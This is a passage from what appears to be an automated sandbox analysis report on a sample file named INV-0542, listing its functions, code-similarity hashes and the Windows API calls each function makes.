Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: AddressAllocFileGlobalHandleInfoModuleProcSizeVersionwsprintf
String ID:
API String ID: 2520467145-0
Opcode ID: 151af76542c190628ef2acf394a4985ed8648910b70884bb67486c00b137938c
Instruction ID: 28cb58910f6a4acfd0ff51bb22372a53c51a3c4cd31b2d17a05334ea7d98b38a
Opcode Fuzzy Hash: 151af76542c190628ef2acf394a4985ed8648910b70884bb67486c00b137938c
Instruction Fuzzy Hash: 9E210871A00218AFDB10DFE9C985AEEBBB4EF08344F51402AFA05B62E0D7759E51DB64

Function 0040254F Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402580
RegCloseKey.KERNELBASE(?,?,?,lftninger\slangetmmerens,00000000,00000011,00000002), ref: 00402622

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 77a5136ceac10c13572c025ea85aaea8472d44a7460d1c056a70da611617ceba
Instruction ID: d59507dec88f13297dcb42e268b6e0170753ff524d958fced3891ef78adf3038
Opcode Fuzzy Hash: 77a5136ceac10c13572c025ea85aaea8472d44a7460d1c056a70da611617ceba
Instruction Fuzzy Hash: 8F118C71904216EADF15DFA0CA589AEB7B4FF04348F20443FE806B62D0D3B84A45DB9D

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
Instruction ID: 2b867b2a322a557ec20ecaa395e060e0be7e2a6973b32d365fcb6e947ad1390c
Opcode Fuzzy Hash: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
Instruction Fuzzy Hash: 9E01F4327242209BE7195B389D05B6B3798E710314F10863FF855F66F1DA78CC429B4C

Function 00402459 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040247B
RegCloseKey.ADVAPI32(00000000), ref: 00402484

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: CloseDeleteValue
String ID:
API String ID: 2831762973-0
Opcode ID: eee6be69eae89fba413121a175eacf98509731d8aa1df2795f329d1288486e8c
Instruction ID: 8adcbc206ff712accdb54216371371453b286a19eaa2ac3ec43ed269339827cd
Opcode Fuzzy Hash: eee6be69eae89fba413121a175eacf98509731d8aa1df2795f329d1288486e8c
Instruction Fuzzy Hash: 48F09C32A04521ABDB10BBA9DB8D5EE7265AB44354F11443FF502B71C1CAFC4D02977D

Function 00405699 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 004056A9

Part of subcall function 0040450C: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040451E

CoUninitialize.COMBASE(00000404,00000000), ref: 004056F5

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: InitializeMessageSendUninitialize
String ID:
API String ID: 2896919175-0
Opcode ID: e6b44ab65c096e2096ca35a4d59063f1915fe47593d787d59728b780318f1d57
Instruction ID: b888f1dcde8397bdf9a4ac710541df7d57aeeece4d3a8f29a6716c55d94af5f1
Opcode Fuzzy Hash: e6b44ab65c096e2096ca35a4d59063f1915fe47593d787d59728b780318f1d57
Instruction Fuzzy Hash: 0AF0B4776007409BE7115B54AE05B5B77B0EB90354F85483AEF8D726F1C7764C028B5D

Function 00405B24 Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B4D
CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B5A

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID:
API String ID: 3712363035-0
Opcode ID: ab728716b39bc4ae5022fc4c28ab15e9e5542c8e0cf41f1555c5a84b4fa30c9d
Instruction ID: 3e6b85693243cf5959e47e0a5ce0ecee53803ede082a99688cf67a66356fc275
Opcode Fuzzy Hash: ab728716b39bc4ae5022fc4c28ab15e9e5542c8e0cf41f1555c5a84b4fa30c9d
Instruction Fuzzy Hash: 3AE0BFB4A10219BFFB10AB64ED05F7B77BCF704604F418825BD10F2551D774A9148A7C

Function 00406935 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,0040362C,0000000C,?,?,?,?,?,?,?,?), ref: 00406947
GetProcAddress.KERNEL32(00000000,?), ref: 00406962

Part of subcall function 004068C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068DC
Part of subcall function 004068C5: wsprintfW.USER32 ref: 00406917
Part of subcall function 004068C5: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040692B

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
Instruction ID: 5f896a6f513cb693e05c26686958cbb9026995673407ad46a654cc37c4de4e39
Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
Instruction Fuzzy Hash: BCE0CD73604310EBD61067755D0493773E89F85B50302483EF947F2140D734DC32A7AA

Function 00406031 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004030E2,00437800,80000000,00000003), ref: 00406035
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406057

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15

Function 0040600C Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,00405C11,?,?,00000000,00405DE7,?,?,?,?), ref: 00406011
SetFileAttributesW.KERNEL32(?,00000000), ref: 00406025

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
Instruction ID: fbd6844141adfc982ff7d741096df028d7bbee698e850df9006aa2ae5f51d9dd
Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
Instruction Fuzzy Hash: 24D0C972504221AFC2103728EE0889BBF55DB542717028A35F8A9A22B0CB304C668694

Function 00405AEF Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,0040350F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405AF5
GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405B03

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
Instruction ID: c3646108da72950d5b730f2af08982bf7448ccd78712563759f5c9f930c8cbe9
Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
Instruction Fuzzy Hash: 11C04C70244906DAD6509B219F0C71779A0EB50781F195839A586E50A0DA34B455D92D

Function 004023D7 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040240E

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
Instruction ID: ca2f62041d63e4abf833ada0eb3473e8090594299762c22e2e4a91b8788c92d6
Opcode Fuzzy Hash: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
Instruction Fuzzy Hash: CEE086319105266BDB103AF20ECE9BE2058AF48308B24093FF512B61C2DEFC8C42567D

Function 004063DC Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E7C,00000000,?,?), ref: 00406405

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
Instruction ID: 15c5175e75f921513b7f3d75ccef30e451623c4c54541e9d5ee9eac1385433f3
Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
Instruction Fuzzy Hash: 1DE0E6B2010109BFEF195F50DD0AD7B371DEB04310F01492EFE16D4051E6B5E9306674

Function 004060E3 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040349F,00000000,00414EC0,?,00414EC0,?,000000FF,00000004,00000000), ref: 004060F7

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
Instruction ID: b9d802e93a63440494d75fc60edee4ff4d41d1542efeb3ab79d4fb436c6ecda5
Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
Instruction Fuzzy Hash: 91E08C3220422AABEF109E909C04EEB3B6CEB003A0F014432FD26E6050D271E9319BA4

Function 004060B4 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034D1,00000000,00000000,00403328,000000FF,00000004,00000000,00000000,00000000), ref: 004060C8

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
Instruction ID: 0a9ed9335d9fcbf33a9b7557f86da276afb46ac39f2db62fb679b5cfb923300a
Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
Instruction Fuzzy Hash: C1E0BF32250269ABDF109E559C00AAB775CEB05251F014436B955E7150D671E92197A4

Function 00402419 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040244A

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
Instruction ID: 53345aa50f94a5dbc05c73a67e8aa0b188b477950ab0ef6c1fe412bbc790425e
Opcode Fuzzy Hash: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
Instruction Fuzzy Hash: E7E04F3180021AAADB00AFA0CE0ADAD3678AF00304F10493EF510BB0D1E7F889509759

Function 004063AE Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000000,?,0040643C,?,?,?,?,: Completed,?,00000000), ref: 004063D2

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

